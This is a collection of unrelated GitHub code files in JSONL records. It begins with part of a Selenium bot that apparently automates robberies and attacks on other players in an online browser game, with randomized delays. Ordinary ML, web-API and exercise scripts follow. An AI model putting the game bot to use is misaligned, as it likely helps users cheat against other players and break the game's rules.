driver.find_element_by_xpath('//*[@id=\"nightclub-singleassault-attack-18\"]/div').value_of_css_property(\"width\")\n percent_stamina = round(100*float(current_stamina[:-2])/128)\n\n# Get addiction\ndef getAddiction():\n global current_toxic, percent_toxic\n toxic_bar = WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"nightclub-singleassault-attack-19\"]/div')))\n if toxic_bar:\n current_toxic = driver.find_element_by_xpath('//*[@id=\"nightclub-singleassault-attack-19\"]/div').value_of_css_property(\"width\")\n percent_toxic = round(100*float(current_toxic[:-2])/128)\n\ndef printStamina():\n global current_stamina, percent_stamina\n getStamina()\n print(\"[INFO] stamina - \" + str(percent_stamina))\n\ndef printToxic():\n global current_toxic, percent_toxic\n getAddiction()\n print(\"[INFO] toxic - \" + str(percent_toxic))\n\ndef goRobMenu():\n pass\n\ndef selectRob():\n pass\n\n# Rob single\ndef robSingle():\n global percent_stamina, percent_toxic\n global driver\n getStamina()\n getAddiction()\n\n if int(percent_toxic) >= 2:\n detox() \n # detox\n \n if int(percent_stamina) < 100:\n refreshStamina()\n\n # //*[@id=\"menu-robbery\"]\n \n robbery_button = WebDriverWait(driver, 20).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"menu-robbery\"]')))\n if robbery_button:\n robbery_button.click()\n robbery_button = WebDriverWait(driver, 20).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"menu-robbery\"]')))\n if robbery_button:\n robbery_button.click()\n \n select = WebDriverWait(driver, 5).until(EC.presence_of_all_elements_located((By.XPATH, \"//*[@id='singlerobbery-select-robbery']\")))\n select = WebDriverWait(driver, 20).until(EC.presence_of_all_elements_located((By.XPATH, \"//*[@id='singlerobbery-select-robbery']/option[@value='8']\")))\n if select:\n # selector = driver.find_element_by_xpath('//*[@id=\"singlerobbery-select-robbery\"]')\n # all_options = selector.find_elements_by_tag_name(\"option\")\n # for option in all_options:\n # if \"SP: 100%\" in option.text:\n # print(\"%s -> %s\" % (option.get_attribute(\"value\"), option.text.strip()), end=\"\\n\")\n selector = Select(driver.find_element_by_xpath('//*[@id=\"singlerobbery-select-robbery\"]'))\n #selector.select_by_value('1')\n selector.select_by_value('48')\n\n #//*[@id=\"full\"]\n checkbox_button = driver.find_element_by_xpath('//*[@id=\"full\"]')\n #print(checkbox_button.is_selected())\n if checkbox_button.is_selected() == False:\n checkbox_button.click()\n\n # //*[@id=\"singlerobbery-rob\"]\n # let's rob\n rob_button = driver.find_element_by_xpath('//*[@id=\"singlerobbery-rob\"]')\n if rob_button:\n rob_button.click()\n time.sleep(1)\n\n# detox\ndef detox():\n global percent_toxic\n global driver\n # //*[@id=\"menu-hospital\"]\n hospital_button = driver.find_element_by_xpath('//*[@id=\"menu-hospital\"]')\n if hospital_button:\n hospital_button.click()\n # metdaone\n # //*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/input\n # //*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/input\n metadone_input = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/input')))\n if metadone_input:\n try:\n metadone_input = driver.find_element_by_xpath('//*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/input')\n metadone_input.send_keys(f'{percent_toxic}') \n except Exception as e: \n print(e)\n \n try:\n metadone_button = driver.find_element_by_xpath('//*[@id=\"content_middle\"]/div/div[3]/table[1]/tbody/tr[5]/td[4]/button') \n metadone_button.click()\n except Exception as e: print(e)\n\n# Go to rave - get full stamina - get out\ndef refreshStamina():\n global driver\n global percent_stamina, percent_toxic\n # go to rave -> //*[@id=\"menu-nightlife\"]\n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"menu-nightlife\"]')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[@id=\"menu-nightlife\"]')\n if rave_button:\n rave_button.click()\n\n # rave 1 //*[@id=\"content_middle\"]/div/div[3]/div[3]/ul[4]/li[1]/div/div[2]/div[2]/button\n # //*[@id=\"content_middle\"]/div/div[3]/div[3]/ul[2]/li[1]/div/div[2]/div[2]/button\n #\n # rave 2 //*[@id=\"content_middle\"]/div/div[3]/div[3]/ul[4]/li[2]/div/div[2]/div[2]/button\n \n # //*[@id=\"content_middle\"]/div/div[3]/div[2]/table/tbody/tr[2]/td[5]/div/button\n # \n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"content_middle\"]/div/div[3]/div[2]/table/tbody/tr[1]/td[5]/div/button')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[@id=\"content_middle\"]/div/div[3]/div[2]/table/tbody/tr[1]/td[5]/div/button')\n # //*[@id=\"content_middle\"]/div/div[3]/div[2]/table/tbody/tr[1]/td[5]/div/button\n if rave_button:\n rave_button.click()\n \n # buy hooker stamina \n # //*[@id=\"content_middle\"]/div/div[3]/table[2]/tbody/tr/td[4]/button\n # //*[@id=\"nightclub-drug-buy-button-2957\"]\n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[starts-with(@id, \"nightclub-drug-buy-button\")]')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[starts-with(@id, \"nightclub-drug-buy-button\")]')\n if rave_button:\n rave_button.click()\n\n\n # leave rave -> \n # //*[@id=\"exit-button-l5Jol5-ZaWnLl2-Wl3CYm5yTapdplWeVmGZlm2eanJmdmGaXnQ\"]\n\n # //*[@id=\"exit-button-l5Jol5-ZaWnLl2-Wl3CYm5yTapdplWeVmGZlm2eanJmdmGaXnQ\"]\n # //*[@id=\"exit-button-aWVtmm1mmJ7HaWdox5pox5-Ua2JmkmyXbGVlaWWXaJJva2uaaw\"]\n # //*[@id=\"exit-button-aWVtmm1mmJ7HaWdox5pox5-Ua2JmkmyXbGVlaWWXaJJva2uaaw\"]\n\n # //*[@id=\"exit-button-aGGalnGcapyZYmljyXCbmHFhbWZpmmucZWaWcWacnZNuZ5iWbw\"]\n\n #rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"exit-button-l5Jol5-ZaWnLl2-Wl3CYm5yTapdplWeVmGZlm2eanJmdmGaXnQ\"]')))\n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[starts-with(@id, \"exit-button\")]')))\n if rave_button:\n #rave_button = driver.find_element_by_xpath('//*[@id=\"exit-button-l5Jol5-ZaWnLl2-Wl3CYm5yTapdplWeVmGZlm2eanJmdmGaXnQ\"]')\n rave_button = driver.find_element_by_xpath('//*[starts-with(@id, \"exit-button\")]')\n # //*[starts-with(@id, \"exit-button\")]\n if rave_button:\n rave_button.click()\n time.sleep(2)\n\n # //*[@id=\"exit-button-aWVtnG1omJyWa2FonJZjycucaWiWlnGaapNrYWZpk2draG2WZA\"]\n # //*[@id=\"exit-button-aWVtnG1omJyWa2FonJZjycucaWiWlnGaapNrYWZpk2draG2WZA\"]\n # //*[@id=\"exit-button-aWVtnG1omJyWa2FonJZjycucaWiWlnGaapNrYWZpk2draG2WZA\"]\n\n\n # buy booze - //*[@id=\"nightclub-drug-buy-button-2415\"]\n # //*[@id=\"nightclub-drug-buy-button-2415\"]\n\ndef prepareHunt():\n # hunt info\n\n # get list of top killers\n\n # make list of dangerous classes\n\n # set target respect\n\n # save them globally\n pass \n\ndef randomString(stringLength=8):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\ndef scanVisitors():\n global driver, original_stdout\n global ignore_list\n # scan for players\n \n try:\n visitor_list = WebDriverWait(driver, 2).until(EC.visibility_of_element_located((By.XPATH, '/html/body/div[2]/div[4]/div/table/tbody/tr/td[1]/div[2]/table/tbody/tr/td/div[2]/div/div[3]/div[1]/h3')))\n if visitor_list:\n #print(\"-> found visitors.\")\n try:\n visitor_div = driver.find_element_by_xpath('/html/body/div[2]/div[4]/div/table/tbody/tr/td[1]/div[2]/table/tbody/tr/td/div[2]/div/div[3]/div[1]')\n visitors = visitor_div.find_elements_by_xpath('.//*[starts-with(@class, \"visitor-\")]')\n for visitor in [visitors[0]]:\n #log_name = 'logs/visitor_{}'.format(randomString(8))\n #print(log_name)\n\n #with open(log_name + \"_details.html\", 'w') as f:\n #f.write(visitor.get_attribute('innerHTML'))\n #print(visitor.get_attribute('innerHTML'))\n\n # find stats\n # name\n # respect\n # profession\n # level\n soup = BS(visitor.get_attribute('innerHTML'), 'html.parser')\n visitor_name = \"\"\n for div in soup.find_all('div', attrs={'class': 'user_list_username'}):\n visitor_name = div.text.strip()\n \n first_children = [i.text for i in soup.select('.visitor_information div:last-child')]\n #print(first_children)\n #print(first_children[-1])\n visitor_respect = first_children[-1].strip()\n visitor_respect = visitor_respect.replace(\"Respect:\", \"\").strip()\n visitor_respect = int(visitor_respect)\n # nth-last-child(2)\n first_children = [i.text for i in soup.select('.visitor_information div:nth-last-child(2)')]\n visitor_prof = first_children[0].strip()\n\n first_children = [i.text for i in soup.select('.visitor_information div:nth-last-child(3)')]\n visitor_rank = first_children[0].strip()\n\n rank_text = \"\"\n estimate_power = \"\"\n\n print(\"{} : {} - {} - {} \".format(colored(visitor_name,\"blue\"), colored(f'{visitor_respect:,}', \"green\"), colored(visitor_prof, \"yellow\"), colored(visitor_rank, \"magenta\")))\n # find boom box\n # click choose\n # nightclub-singleassault-select-open\n try:\n select_open = visitor.find_element_by_xpath('.//*[starts-with(@id, \"nightclub-singleassault-select-open\")]')\n if select_open:\n select_open.click()\n \n\n # click single\n # nightclub-select-assault-type-single\n type_single = visitor.find_element_by_xpath('.//*[starts-with(@id, \"nightclub-select-assault-type-single\")]')\n if type_single:\n type_single.click()\n\n attack_him = False\n if visitor_rank != \"Hitman\":\n if visitor_name not in name_ignore:\n if visitor_prof not in ignore_list:\n if visitor_respect <=160000:\n attack_him = True\n else:\n if visitor_respect <=70000:\n attack_him = True\n\n # click kill\n # nightclub-attack\n type_kill = visitor.find_element_by_xpath('.//*[starts-with(@id, \"nightclub-attack\")]')\n if type_kill:\n if attack_him:\n type_kill.click()\n leaveRave(sleep=1)\n print(\"{} : {} - {} - {} \".format(colored(visitor_name,\"red\"), colored(f'{visitor_respect:,}', \"green\"), colored(visitor_prof, \"yellow\"), colored(visitor_rank, \"magenta\"))) \n time.sleep(5)\n return\n #driver.quit()\n #sys.exit(0)\n else:\n pass\n #print(\"You are safe for now -> {} : {} - {} - {} \".format(colored(visitor_name,\"red\"), colored(f'{visitor_respect:,}', \"green\"), colored(visitor_prof, \"yellow\"), colored(visitor_rank, \"magenta\")))\n leaveRave(sleep=1)\n except:\n leaveRave(sleep=1)\n except:\n leaveRave(sleep=2)\n except:\n pass\n\ndef scanPrey():\n global driver\n global percent_stamina, percent_toxic\n try:\n getStamina()\n if int(percent_stamina) < 50:\n refreshStamina()\n getAddiction()\n if int(percent_toxic) >= 5:\n detox() \n enterRandomRave(sleep=0)\n scanVisitors()\n leaveRave(sleep=0)\n except:\n increaseErrorCount()\n\ndef increaseRaveCount():\n global rave_counter\n rave_counter += 1\n #print(\"[INFO] - Raves visited : {}\".format(rave_counter))\n\ndef goDrinkBoze():\n pass\n\ndef goRaveMenu(sleep=2):\n global driver\n if sleep == -1:\n sleep = random.randint(2,5)\n time.sleep(sleep)\n try:\n rave_button = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"menu-nightlife\"]')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[@id=\"menu-nightlife\"]')\n if rave_button:\n rave_button.click()\n except:\n increaseErrorCount()\n\ndef leaveRave(sleep=5):\n global rave_counter\n if sleep == -1:\n sleep = random.randint(3,7)\n global driver\n try:\n rave_button = WebDriverWait(driver, 2).until(EC.visibility_of_element_located((By.XPATH, '//*[starts-with(@id, \"exit-button\")]')))\n if rave_button:\n rave_button = driver.find_element_by_xpath('//*[starts-with(@id, \"exit-button\")]')\n if rave_button:\n rave_button.click()\n \n increaseRaveCount()\n time.sleep(sleep)\n except:\n increaseErrorCount()\n\ndef enterRandomRave(sleep=0):\n global driver\n if sleep == -1:\n sleep = random.randint(2,5)\n time.sleep(sleep)\n rave_number = random.randint(3, 10)\n xpath_rave = '(//button[contains(@class,\"btn btn-inverse btn btn-inverse btn-small pull-right\")])[{}]'.format(rave_number)\n try:\n rave_button = WebDriverWait(driver, 4).until(EC.visibility_of_element_located((By.XPATH, xpath_rave)))\n if rave_button:\n rave_button = driver.find_element_by_xpath(xpath_rave)\n if rave_button:\n rave_button.click()\n except:\n increaseErrorCount()\n\ndef checkErrorCount():\n global error_counter, driver\n # if error_counter == 50:\n # print(\"[INFO] ABORTED DUE TO ERROR COUNT - {}\".format(error_counter))\n # leaveRave(sleep=0)\n # driver.quit()\n # sys.exit(1)\n\ndef increaseErrorCount():\n global error_counter\n error_counter += 1\n checkErrorCount()\n\ndef hunt():\n # hunt\n pass\n # go to rave menu\n\n # if stam < 50 - first thing when enter rave - drink fast\n\n # enter random disco with booze\n\n # scan for players\n\n # check for danger name or profession - rank\n # escape if danger\n\n\n # check respect\n\n # hit\n\n # leave rave\n\n # sleep random\n\n\n\nif __name__ == \"__main__\":\n login()\n #robSingle()\n #time.sleep(20)\n time.sleep(5)\n while True:\n #robSingle()\n goRaveMenu(sleep=2)\n scanPrey()\n","repo_name":"archwiz/tc-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33830254031","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#【tf-mnist】\n#\n# 概要:\n# tensorflow を利用したMNIST(手書き文字認識)\n#\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nBATCH_SIZE = 50\n\n# mnist データを格納したオブジェクトを作成\nmnist = input_data.read_data_sets(\"./data/\", one_hot = True)\n\n# 学習データの取得(バッチサイズ)\n# train_images, train_labels = mnist.train.next_batch(BATCH_SIZE)\n# (50, 784)\n# print(train_images.shape) \n\n# テスト用の全画像データ (10000,10)\n# test_images = mnist.test.images\n# テスト用の全正解データ (10000,10)\n# test_labels = mnist.test.labels\n\n# (お勉強)\n#\n# Variable と Placeholder の違い\n#\n# [Variable]\n# ネットワークの入力層,隠れ層,出力層の重みやパラメータを定義,保存しておくためのデータ構造\n# [Placeholder]\n# ニューラルネットの入力として与えるデータの形を定義しておくためのデータ構造 \n#\n# https://qiita.com/eve_yk/items/e42431200a1616c7d045\n# https://qiita.com/icoxfog417/items/fb5c24e35a849f8e2c5d\n# https://qiita.com/MENDY/items/49bff2c16d7a49243acd (関数の定義方法)\n\n# 入力データの定義(入力データなので placeholder で定義する)\nx = tf.placeholder(tf.float32, [None, 784])\n\n# 入力画像\n# (バッチサイズ, 高さ, 横幅, チャネル数) に変換\nimg = tf.reshape(x, [-1, 28, 28, 1])\ntf.summary.image(\"input_data\", img, 100)\n\n#===\n# ネットワークの定義\n#===\n#\n# 入力(x)層から中間層(h_1)\nwith tf.name_scope(\"hidden\"):\n w_1 = tf.Variable(tf.truncated_normal([784, 64], stddev = 0.1), name = \"w1\")\n b_1 = tf.Variable(tf.zeros([64]), name = \"b1\")\n h_1 = tf.nn.relu(tf.matmul(x, w_1) + b_1) # y = RELU((x * w) + b)\n # 中間層の重みの分布をログ出力\n tf.summary.histogram(\"w_1\", w_1)\n \n# 中間層(h_1)から出力層(out)\nwith tf.name_scope(\"output\"):\n w_2 = tf.Variable(tf.truncated_normal([64, 10], stddev = 0.1), name = \"w2\")\n b_2 = tf.Variable(tf.zeros([10]), name = \"b2\")\n out = tf.nn.softmax(tf.matmul(h_1, w_2) + b_2)\n\n\ny = tf.placeholder(tf.float32, [None, 10])\n# 誤差関数の定義\nwith tf.name_scope(\"loss\"):\n loss = tf.reduce_mean(tf.square(y - out))\n tf.summary.scalar(\"loss\", loss)\n \n# trainer オブジェクト\nwith tf.name_scope(\"trian\"):\n train_step = tf.train.GradientDescentOptimizer(0.5).minimize(loss)\n\n# 精度評価\nwith tf.name_scope(\"accuracy\"):\n correct = tf.equal(tf.argmax(out,1), tf.argmax(y,1))\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n tf.summary.scalar(\"accuracy\", accuracy)\n \n# 初期化\ninit = tf.global_variables_initializer()\n\n# ログのマージ\nsummary_op = tf.summary.merge_all()\n\n# 学習の実行\nwith tf.Session() as sess:\n summary_writer = tf.summary.FileWriter(\"logs\", sess.graph)\n sess.run(init)\n \n # テスト用の全画像データ (10000,10)\n test_images = mnist.test.images\n # テスト用の全正解データ (10000,10)\n test_labels = mnist.test.labels\n\n for i in range(10000):\n step = i + 1\n train_images, train_labels = mnist.train.next_batch(BATCH_SIZE)\n sess.run(train_step, feed_dict = {x: train_images, y: train_labels})\n if step % 10 == 0:\n # ログを取る処理をする\n summary_str = sess.run(summary_op, feed_dict = {x: test_images, y: test_labels})\n summary_writer.add_summary(summary_str, step)\n acc_val = sess.run(accuracy,feed_dict = {x: test_images, y: test_labels})\n print('Step %d: accuracy = %.2f' % (step, acc_val))\n","repo_name":"hisashi-ito/tensorflow-lesson","sub_path":"mnist/tf-mnist.py","file_name":"tf-mnist.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2166893430","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param A : head node of linked list\n # @return the head node in the linked list\n def solve(self, A):\n zero, one = 0, 0\n temp = A\n while temp is not None:\n if temp.val == 0: zero += 1\n else: one += 1\n temp = temp.next\n temp = A\n while temp is not None:\n if zero > 0:\n temp.val = 0\n zero -= 1\n else:\n temp.val = 1\n temp = temp.next\n return A\n","repo_name":"itsmesoumik23/iBit-Solutions","sub_path":"sort binary linkedlist.py","file_name":"sort binary linkedlist.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22030544758","text":"# Time complexity: O(logn)\n# Space complexity: O(1)\nclass Solution:\n def firstBadVersion(self, n: int) -> int:\n good = 0\n bad = n\n\n while bad > good + 1:\n mid = good + ((bad - good) // 2)\n if isBadVersion(mid):\n bad = mid\n else:\n good = mid\n\n return bad ","repo_name":"redhudy/my-leetcode-solutions","sub_path":"solutions/0278. First Bad Version/0278.py","file_name":"0278.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13350589954","text":"from builtins import range\nimport sys\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\nimport os\n\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\n\nimport random\n\ndef pub_444_spaces_in_filenames():\n\n # tempdir = \"smalldata/jira/\"\n # if was okay to write to smalldata, it's okay to write to the current directory\n # probably don't want to, but can't find what the standard temp directory is supposed to be. no sandbox?\n tempdir = \"./\"\n # make a few files with spaces in the name\n f1 = open(pyunit_utils.locate(tempdir) + \"foo .csv\", \"w\")\n f1.write(\"response, predictor\\n\")\n for i in range(10):\n f1.write(\"1, a\\n\")\n f1.write(\"0, b\\n\")\n f1.write(\"1, a\\n\" if random.randint(0,1) else \"0, b\\n\")\n f1.close()\n\n f2 = open(pyunit_utils.locate(tempdir) + \"b a r .csv\", \"w\")\n f2.write(\"response, predictor\\n\")\n for i in range(10):\n f2.write(\"1, a\\n\")\n f2.write(\"0, b\\n\")\n f2.write(\"1, a\\n\" if random.randint(0,1) else \"0, b\\n\")\n f2.close()\n\n f3 = open(pyunit_utils.locate(tempdir) + \" ba z.csv\", \"w\")\n for i in range(10):\n f3.write(\"1, a\\n\")\n f3.write(\"0, b\\n\")\n f3.write(\"1, a\\n\" if random.randint(0,1) else \"0, b\\n\")\n f3.close()\n\n train_data = h2o.upload_file(path=pyunit_utils.locate(tempdir + \"foo .csv\"))\n train_data.show()\n train_data.describe()\n train_data[\"response\"] = train_data[\"response\"].asfactor()\n gbm = H2OGradientBoostingEstimator(ntrees=1, distribution=\"bernoulli\", min_rows=1)\n gbm.train(x=list(range(1,train_data.ncol)), y=\"response\", training_frame=train_data)\n gbm.show()\n\n train_data = h2o.upload_file(path=pyunit_utils.locate(tempdir + \"b a r .csv\"))\n train_data.show()\n train_data.describe()\n train_data[\"response\"] = train_data[\"response\"].asfactor()\n\n gbm = H2OGradientBoostingEstimator(ntrees=1, distribution=\"bernoulli\", min_rows=1)\n gbm.train(x=1, y=\"response\", training_frame=train_data)\n\n gbm.show()\n\n train_data = h2o.upload_file(path=pyunit_utils.locate(tempdir + \" ba z.csv\"))\n train_data.show()\n train_data.describe()\n train_data[0]=train_data[0].asfactor()\n gbm = H2OGradientBoostingEstimator(ntrees=1, distribution=\"bernoulli\", min_rows=1)\n gbm.train(x=1, y=0, training_frame=train_data)\n gbm.show()\n\n os.remove(pyunit_utils.locate(tempdir) + \"foo .csv\")\n os.remove(pyunit_utils.locate(tempdir) + \"b a r .csv\")\n os.remove(pyunit_utils.locate(tempdir) + \" ba z.csv\")\n\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(pub_444_spaces_in_filenames)\nelse:\n pub_444_spaces_in_filenames()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_jira/pyunit_pub_444_spaces_in_filenames.py","file_name":"pyunit_pub_444_spaces_in_filenames.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"17492490547","text":"from rest_framework.generics import ListAPIView\nfrom rest_framework import filters\nfrom basics.serializers import AmountUnitSerializer, CurrencySerializer\nfrom .models import AmountUnit, Currency\n\n\nclass AmountUnitView(ListAPIView):\n queryset = AmountUnit.objects.all()\n serializer_class = AmountUnitSerializer\n filter_backends = [filters.OrderingFilter]\n ordering = ('id', )\n\n\nclass CurrencyView(ListAPIView):\n queryset = Currency.objects.all()\n serializer_class = CurrencySerializer\n filter_backends = [filters.OrderingFilter]\n ordering = ('id', )\n","repo_name":"metalgear-dev/recipe-manager-backend","sub_path":"basics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29876438172","text":"import cv2 as cv\n\nimg = cv.imread('photos/profile.jpg')\ncv.imshow('profile', img)\n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('profile', gray)\n\nhaar_cascade = cv.CascadeClassifier('haarcascade_frontalface.xml')\nfaces_rect = haar_cascade.detectMultiScale(gray, scalefactor=-1.1, minNeighbors=3)\n\nprint(f'Number of faces found = {len(faces_rect)}')\n\ncv.waitKey(0)","repo_name":"GitataY/Computer-vision","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44351817750","text":"#Single Customer Control\n\n\nclass Account:\n \n def __init__(self,owner,balance):\n \n self.owner=owner\n self.balance=balance\n \n \n def __str__(self):\n return f'Account Owner : {self.owner}\\nAccount Balance: {self.balance}'\n \n \n def deposit(self,money):\n print('Deposit Accepted')\n self.balance+=money\n \n \n def withdraw(self,money):\n if(money<=self.balance):\n print('Withdrawl Accepted')\n self.balance-=money\n else:\n print('Funds Unavailable')\n\n\nname=input('Enter the customer\\'s name : ')\nbal=float(input('Enter the balance in account : '))\nacc=Account(name,bal)\nwhile True:\n print('Type (\\'w\\' for withdrawl , \\'d\\' for deposite , \\'e\\' for exit)')\n ch=input('Enter choice : ')\n if ch.lower()=='w' :\n acc.withdraw(float(input('Money to be withdrawn : ')))\n print(f'Your available account balance = {acc.balance}\\n')\n elif ch.lower()=='d' :\n acc.deposit(float(input('Money to be deposited : ')))\n print(f'Your available account balance = {acc.balance}\\n')\n elif ch.lower()=='e':\n break\n else:\n print('OOPs! Error Occured')\n\n","repo_name":"prabhatmalhan/Bank","sub_path":"single_customer.py","file_name":"single_customer.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22570712903","text":"import time\nfrom fastapi import FastAPI, Request\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom src.core.settings import settings\nfrom src.api.base_router import base_router\n\n\ntags = [\n {\n \"name\": \"auth\",\n \"description\": \"Вход в админ-панель\"\n },\n {\n \"name\": \"users\",\n \"description\": \"Управление пользователями админ-панели\"\n },\n {\n \"name\": \"bots\",\n \"description\": \"Управление ботами\"\n },\n {\n \"name\": \"intents\",\n \"description\": \"Взаимодействие с интентами\"\n },\n {\n \"name\": \"client_chat\",\n \"description\": \"Взаимодействие с клиентским чатом\"\n },\n {\n \"name\": \"admin_chat\",\n \"description\": \"Взаимодействие с чатом в админ-панели\"\n },\n {\n \"name\": \"relations\",\n \"description\": \"Управление связями\"\n },\n {\n \"name\": \"ml\",\n \"description\": \"Взаимодействие с моделями\"\n },\n]\n\napp = FastAPI(\n title='Центральный сервер',\n description=\"\"\"\n Анекдот от ChatGPT:\n \n Однажды разработчики создали API, но они забыли задокументировать его.\n Они решили добавить Swagger для описания API и документации.\n Однако они были так увлечены написанием документации, что забыли реализовать сам API.\n Так что, когда кто-то попытался использовать их API, он вернул только один ответ: \"Документация недоступна\".\n \n Moral of the story: Не забывайте, что Swagger - это всего лишь инструмент для документирования вашего API, а не сам API.\n \"\"\",\n version='0.3.3',\n openapi_tags=tags,\n docs_url=settings.docs_url,\n redoc_url=settings.redoc_url,\n)\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(base_router)\n\n\n@app.middleware(\"http\")\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers[\"X-Process-Time\"] = str(process_time)\n return response\n","repo_name":"ZotovNikita/Back_central_server","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43219981487","text":"import numpy as np\nimport rasterio as rio\nfrom .generators.generators import SimpleImageGenerator\nfrom .misc import *\n\ndef mergeDataAndTarget(data, target):\n target_1 = target.reshape(target.shape[0], 1, target.shape[1], \n target.shape[2], target.shape[3])\n data_1 = np.concatenate([data, target_1], axis=1)\n data_1 = data_1.squeeze(axis=-1)\n return data_1\n\n\ndef splitDataAndTarget(dataMergeTarget):\n data = np.expand_dims(dataMergeTarget[:, :-1, :, :], axis=-1)\n target = dataMergeTarget[:, -1, :, :]\n target = np.expand_dims(target, axis=-1)\n return (data, target)\n\n\ndef generate(dataMergeTarget, datagen):\n data_iterator = datagen.flow_from_list(x=dataMergeTarget, nframes=dataMergeTarget.shape[1])\n \n res = []\n nSamples = 100\n while nSamples > 0:\n #print(nSamples)\n res1 = data_iterator._get_batches_of_transformed_samples(np.arange(dataMergeTarget.shape[0]))\n res.append(res1)\n nSamples -= 1\n return np.vstack(res)\n\n\ndef checkImageSize(imgPath, crop_size):\n with rio.open(imgPath) as src:\n img = src.read(1)\n return (img.shape[0] >= 2*crop_size and img.shape[1] >= 2*crop_size)\n return False\n\n\ndef augmentationOneReservoir(reservoirIndex, dataDir='MOD13Q1', \n bandsUse=['NIR'], timeSteps=7,\n crop_size=20, random_crop=True):\n # Create data file if not created yet\n listTestFiles = createFileData(dataDir=dataDir, reservoirsUse=[reservoirIndex], \n bandsUse=bandsUse, timeSteps=timeSteps)\n if not checkImageSize(listTestFiles[0], crop_size):\n return False\n\n # Load data\n reduceSize = None\n #reduceSize = (40,40)\n if not os.path.isdir(os.path.join('data', str(reservoirIndex), str(timeSteps))):\n os.makedirs(os.path.join('data', str(reservoirIndex), str(timeSteps)))\n (train_data, train_target) = get_data('train', reservoirIndex, timeSteps, \n reduceSize=reduceSize)\n (val_data, val_target) = get_data('val', reservoirIndex, timeSteps, \n reduceSize=reduceSize)\n (test_data, test_target) = get_data('test', reservoirIndex, timeSteps, \n reduceSize=reduceSize)\n\n train_merged = mergeDataAndTarget(train_data, train_target)\n val_merged = mergeDataAndTarget(val_data, val_target)\n test_merged = mergeDataAndTarget(test_data, test_target)\n \n datagen = SimpleImageGenerator(crop_size=(crop_size,crop_size), random_crop=random_crop)\n train = generate(train_merged, datagen)\n val = generate(val_merged, datagen)\n test = generate(test_merged, datagen)\n\n train_data_augment, train_target_augment = splitDataAndTarget(train)\n val_data_augment, val_target_augment = splitDataAndTarget(val)\n test_data_augment, test_target_augment = splitDataAndTarget(test)\n\n data_augment_path_prefix = os.path.join('data_augment', str(reservoirIndex), str(timeSteps))\n if not os.path.isdir(data_augment_path_prefix):\n os.makedirs(data_augment_path_prefix)\n train_path = os.path.join(data_augment_path_prefix, 'train.dat')\n val_path = os.path.join(data_augment_path_prefix, 'val.dat')\n test_path = os.path.join(data_augment_path_prefix, 'test.dat')\n\n cache_data((train_data_augment, train_target_augment), train_path)\n cache_data((val_data_augment, val_target_augment), val_path)\n cache_data((test_data_augment, test_target_augment), test_path)\n\n return 